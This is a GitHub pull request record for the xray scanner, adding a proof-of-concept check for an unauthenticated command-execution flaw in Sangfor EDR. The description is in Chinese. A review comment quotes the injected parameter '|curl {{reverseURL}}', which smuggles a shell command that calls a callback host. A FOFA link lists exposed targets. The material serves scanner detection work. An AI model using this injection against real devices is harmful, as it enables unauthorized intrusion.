Create sangfor-edr-unauthorized-rce.yml
chaitin/xray pull request #891
Opened 2020-09-11 07:24 UTC by x1n9Qi8

## 本 poc 是检测什么漏洞的
深信服EDR远程命令执行漏洞
## 测试环境
https://fofa.so/result?q=%E7%BB%88%E7%AB%AF%E6%A3%80%E6%B5%8B%E5%93%8D%E5%BA%94%E5%B9%B3%E5%8F%B0
## 备注
detail:
  author: x1n9Qi8
  links:
    - https://www.cnblogs.com/0day-li/p/13650452.html

2020-09-13 02:25 UTC, zema1 requested changes

2020-09-13 02:25 UTC, zema1 commented on pocs/sangfor-edr-unauthorized-rce.yml
> +      {"params":"w=123\"'1234123'\"|curl {{reverseURL}}"}
这个漏洞是回显的吧 为什么要用反连服务呢

2020-09-15 11:55 UTC, x1n9Qi8 commented on pocs/sangfor-edr-unauthorized-rce.yml
> +      {"params":"w=123\"'1234123'\"|curl {{reverseURL}}"}
修改了一下重新提交了，请见 #897

2020-09-16 07:45 UTC, zema1 commented
dup of https://github.com/chaitin/xray/pull/897

2020-09-16 07:45 UTC, closed without merging